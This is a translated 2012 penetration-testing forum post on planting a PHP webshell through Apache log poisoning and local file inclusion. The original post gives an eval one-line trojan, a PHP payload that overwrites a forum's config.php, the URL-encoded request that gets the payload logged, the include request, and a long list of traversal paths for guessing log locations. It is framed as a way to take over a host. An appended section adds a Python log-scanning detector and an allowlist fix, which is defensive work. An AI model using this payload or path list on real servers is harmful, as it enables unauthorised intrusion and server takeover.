China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: Writing a webshell by including the Apache log from PHP
Author: admin
Date: 2012-9-15 14:27
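The approach above is not very practical: in my testing I found that the logs easily run to tens of megabytes, and at that size it is no fun to work with. So let's take the idea a step further and write a genuinely practical webshell to use, which is also far better than the painfully slow method above.

For example, take the same one-line trojan again: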
<?eval($_POST[cmd]);?>

By now you have probably realized that this is a pretty good approach. Reading on, the question becomes how to write it. Use this:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php and then writes <?eval($_POST[cmd]);?>, the server-side statement of the one-line trojan, into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?> // writes the one-line trojan statement into config.php

We submit this statement so that Apache records it in the error log, then include the log, and the shell is written. Remember that it must be converted to URL-encoded form for this to succeed.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E

We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

This way the error log records this line of code that writes the webshell.
Next we include the log by submitting:
http://xxx.com/z.php?zizzy=/home
... /logs/www-error_log

With that, the webshell has been written successfully: the one-line trojan statement is now in config.php.
OK. http://www.xxx.com/forum/config.php has now become our webshell.
Connect to it directly with lanker's client, and the host is yours.

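PS: Everything described above requires that the folder be writable; the permissions must be -rwxrwxrwx (777) for this to go any further. Here, simply use the directory listed above to check. Everything above also assumes that the log path is known.

For other log paths, you can guess, or refer to the list here.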
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
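
Added example, not part of the original post: the two requests described above (PHP code in the request line, then a log path passed to the include parameter) both leave entries in the Apache access log, so a defender can look for them there. The sample lines are constructed, the PHP payload in them is a harmless stand-in, and the access-log layout is an assumption; z.php and zizzy are the names used in the post.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PHP_TAG = re.compile(r"<\?")  # PHP open tag, visible once the target is decoded
# File names taken from the post's path list (including its "acces" spelling).
LOG_FILE = re.compile(r"(?:access?|error)[._]log", re.I)

def classify(line):
    """Return the set of findings for one access-log line."""
    findings = set()
    match = REQUEST.search(line)
    if not match:
        return findings
    target = match.group(1)
    # Decode twice so a double-encoded tag (%253C%253F) is caught as well.
    if PHP_TAG.search(unquote(unquote(target))):
        findings.add("php-tag-in-request")
    # parse_qsl decodes each value once; decode again for double encoding.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if LOG_FILE.search(unquote(value)):
            findings.add("log-file-in-parameter")
    return findings

def scan(lines):
    """Report suspicious lines; escalate a log include that follows poisoning."""
    poisoned, report = False, []
    for number, line in enumerate(lines, 1):
        findings = classify(line)
        if "php-tag-in-request" in findings:
            poisoned = True
        if poisoned and "log-file-in-parameter" in findings:
            findings.add("include-after-poisoning")
        if findings:
            report.append((number, sorted(findings)))
    return report

# Constructed sample lines (documentation addresses, harmless stand-in payload).
SAMPLE = [
    '203.0.113.5 - - [15/Sep/2012:14:20:01 +0800] "GET /forum/index.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Sep/2012:14:21:10 +0800] "GET /z.php?zizzy=../apache/logs/access.log HTTP/1.1" 200 0',
    '203.0.113.9 - - [15/Sep/2012:14:22:37 +0800] "GET /%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 404 210',
    '203.0.113.9 - - [15/Sep/2012:14:23:02 +0800] "GET /z.php?zizzy=%2Fvar%2Flog%2Fhttpd%2Ferror_log HTTP/1.1" 200 48211',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE):
        print(f"line {number}: {', '.join(findings)}")
```

The durable fix is in the including script itself: map the parameter to a fixed allowlist of files instead of passing it to include, and keep the log files unreadable to the account PHP runs as.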